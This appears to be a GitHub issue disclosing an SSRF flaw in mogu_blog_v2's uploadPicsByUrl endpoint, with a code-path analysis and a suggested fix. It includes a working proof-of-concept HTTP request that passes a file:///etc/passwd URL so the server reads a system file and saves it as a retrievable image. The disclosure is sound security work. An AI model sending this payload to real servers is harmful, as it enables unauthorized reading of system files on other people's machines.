Skip to content

mogu_blog_v2-FileRestApi#uploadPicsByUrl-存在SSRF漏洞(mogu_blog_v2-FileRestApi#uploadPicsByUrl has a SSRF vulnerability) #97

New issue
New issue
Open
Open
mogu_blog_v2-FileRestApi#uploadPicsByUrl-存在SSRF漏洞(mogu_blog_v2-FileRestApi#uploadPicsByUrl has a SSRF vulnerability)#97
@c3p0ooo-Yiqiyin

Description

@c3p0ooo-Yiqiyin
c3p0ooo-Yiqiyin
opened on Mar 30, 2023

1、复现详情(Reproduction details)

构造BurpSuite请求报文,利用file协议读取文件/etc/passwd中的内容,写入到图片中:
Construct a BurpSuite request message, use the file protocol to read the contents of the /etc/passwd file, and write it into an image:

POST /mogu-picture/file/uploadPicsByUrl HTTP/1.1
Host: you-ip:8602
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Authorization: bearer_eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJhZG1pblVpZCI6IjFmMDFjZDFkMmY0NzQ3NDNiMjQxZDc0MDA4YjEyMzMzIiwicm9sZSI6Im51bGzotoXnuqfnrqHnkIYiLCJjcmVhdGVUaW1lIjoxNjgwMTU2NjY4NTExLCJzdWIiOiJhZG1pbiIsImlzcyI6Im1vZ3VibG9nIiwiYXVkIjoiMDk4ZjZiY2Q0NjIxZDM3M2NhZGU0ZTgzMjYyN2I0ZjYiLCJleHAiOjE2ODAxNjAyNjgsIm5iZiI6MTY4MDE1NjY2OH0.oXuQcn6Do52V7XkiPiH1Ug1XKOHNgKk4BTeksFgj8DI
Connection: close
Content-Type: application/json
Content-Length: 122

{
	"token":"asdf",
        "adminUid":"asdf",
        "sortName":"admin",
        "projectName":"blog",
        "urlList":[
                "file:///etc/passwd"]
}

image

访问图片地址:http://you-ip:8600/blog/admin/jpg/2023/3/30/1680160261977.jpg

Visit image address: http://your-ip:8600/blog/admin/jpg/2023/3/30/1680160261977.jpg
image

2、底层分析(Bottom-up analysis)

入口点:
Entrance point:
FileRestApi#uploadPicsByUrl
image

进入uploadPictureByUrl()方法:
传入的fileV0为springboot前端传入的参数自动装配,从fileV0中取出urlList
Enter the uploadPictureByUrl() method:
The incoming fileV0 is the parameter automatically wired by the Spring Boot frontend. Extract urlList from fileV0
image

遍历urlList并传入uploadPictureByUrl()方法中,中间未作任何过滤:
Traverse urlList and pass it into the uploadPictureByUrl() method without any filtering in between:
image

更进uploadPictureByUrl方法:
uploadPictureByUrl方法中也未作任何过滤,直接传入URL类中
Further improve the uploadPictureByUrl method:
no filtering is done in the uploadPictureByUrl method, and the URL is directly passed in
image

调用openConnection方法后,获取数据流写入输出流中:
After calling the openConnection method, get the data stream and write it to the output stream:
image

文件写入的路径(文件输出流):
The path for writing the file (output stream):
image

3、修复方案(Repair plan)

(1)建议使用HttpURLConnection类,替代Url类,并对请求的ip地址进行判断,过滤掉内网ip
(1)Suggest using the HttpURLConnection class instead of the Url class, and filtering out intranet IP addresses by checking the requested IP address

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions